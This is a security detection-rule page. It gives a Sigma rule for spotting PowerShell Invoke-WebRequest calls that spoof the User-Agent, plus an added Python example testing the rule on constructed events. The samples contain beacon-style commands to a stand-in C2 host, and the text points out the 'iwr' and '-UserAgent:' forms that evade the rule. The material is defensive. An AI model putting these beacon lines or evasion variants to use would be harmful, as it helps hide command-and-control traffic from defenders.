Change User Agents with WebRequest
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection and network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, are embedded within the protocol traffic between the client and server. This rule covers one PowerShell-specific variant of that behaviour: a script block that calls Invoke-WebRequest with an explicit -UserAgent, i.e. a download or beacon that deliberately replaces PowerShell's default User-Agent string with one that looks like a browser or other common client.
Sigma rule
```yaml
title: Change User Agents with WebRequest
id: d4488827-73af-4f8d-9244-7b7662ef046e
status: test
description: |
    Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.
    Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols
author: frack113
date: 2022/01/23
modified: 2023/01/02
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'Invoke-WebRequest'
            - '-UserAgent '
    condition: selection
falsepositives:
    - Unknown
level: medium
```
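The following is an added example, not part of the rule or the Sigma project, that evaluates the rule's selection the way a backend would: Sigma's `contains|all` modifier requires every listed substring to appear in the field, and Sigma string matching is case-insensitive by default. The `ps_script` log source corresponds to Event ID 4104 (Microsoft-Windows-PowerShell/Operational) with Script Block Logging enabled. The sample events are constructed, not real telemetry; the `ScriptBlockEvent` class and `example.invalid` host are assumptions of the example. Two of the samples are included specifically to show what the literal `'-UserAgent '` term (note the trailing space) does not catch: the `iwr` alias for Invoke-WebRequest, and the `-UserAgent:value` parameter syntax.

```python
"""Evaluate the Sigma selection for 'Change User Agents with WebRequest'
over constructed PowerShell script block (Event ID 4104) events.
Added example; not part of the original rule or the Sigma project."""
from dataclasses import dataclass

# The rule's `ScriptBlockText|contains|all` terms, verbatim, including the
# trailing space after -UserAgent.
RULE_TERMS = ("Invoke-WebRequest", "-UserAgent ")

# Sigma's `windows/ps_script` category maps to Event ID 4104 of
# Microsoft-Windows-PowerShell/Operational.
PS_SCRIPT_BLOCK_EVENT_ID = 4104


@dataclass
class ScriptBlockEvent:
    """Minimal stand-in (assumption of this example) for a 4104 event."""
    event_id: int
    script_block_text: str


def matches_rule(event: ScriptBlockEvent, terms=RULE_TERMS) -> bool:
    """True when the event satisfies the rule's selection.

    `contains|all` means every term must be a substring of ScriptBlockText;
    Sigma compares strings case-insensitively, so both sides are lowercased.
    """
    if event.event_id != PS_SCRIPT_BLOCK_EVENT_ID:
        return False
    text = event.script_block_text.lower()
    return all(term.lower() in text for term in terms)


# Constructed sample events (example.invalid is a reserved, non-routable name).
SAMPLE_EVENTS = [
    # 1. The behaviour the rule targets: browser-like UA on an IWR download.
    ScriptBlockEvent(4104, 'Invoke-WebRequest -Uri http://example.invalid/c2 '
                           '-UserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"'),
    # 2. Same thing in lower case; Sigma matching is case-insensitive.
    ScriptBlockEvent(4104, 'invoke-webrequest -useragent "curl/7.0" -uri http://example.invalid/'),
    # 3. Benign-looking IWR without -UserAgent: not matched.
    ScriptBlockEvent(4104, 'Invoke-WebRequest -Uri https://www.powershellgallery.com/api/v2'),
    # 4. Alias `iwr`: the literal 'Invoke-WebRequest' term is absent, so not matched.
    ScriptBlockEvent(4104, 'iwr -UserAgent "Mozilla/5.0" http://example.invalid/c2'),
    # 5. `-UserAgent:value` syntax: no space after the parameter name, so the
    #    '-UserAgent ' term with trailing space does not match.
    ScriptBlockEvent(4104, 'Invoke-WebRequest -UserAgent:"Mozilla/5.0" -Uri http://example.invalid/c2'),
    # 6. Right text, wrong event type (4103 module logging): outside ps_script.
    ScriptBlockEvent(4103, 'Invoke-WebRequest -UserAgent "x" -Uri http://example.invalid/'),
]


def run_detection(events):
    """Return one boolean per event: whether the rule would alert on it."""
    return [matches_rule(event) for event in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, run_detection(SAMPLE_EVENTS)):
        print(f"{'ALERT ' if hit else 'ignore'}  {event.script_block_text}")
```

Events 1 and 2 alert; events 3 to 6 do not. Events 4 and 5 are the ones to weigh when tuning: the rule is deliberately narrow (a literal cmdlet name and a space-terminated parameter), which keeps the `Unknown` false-positive rate manageable but means an operator who types `iwr` or `-UserAgent:` never trips it. Anyone widening the terms should expect more hits from administrative scripts that set a User-Agent for legitimate API calls.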
References
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols
Related rules
- Renamed Visual Studio Code Tunnel Execution
- Visual Studio Code Tunnel Execution
- Visual Studio Code Tunnel Service Installation
- Visual Studio Code Tunnel Shell Execution
- Suspicious User Agent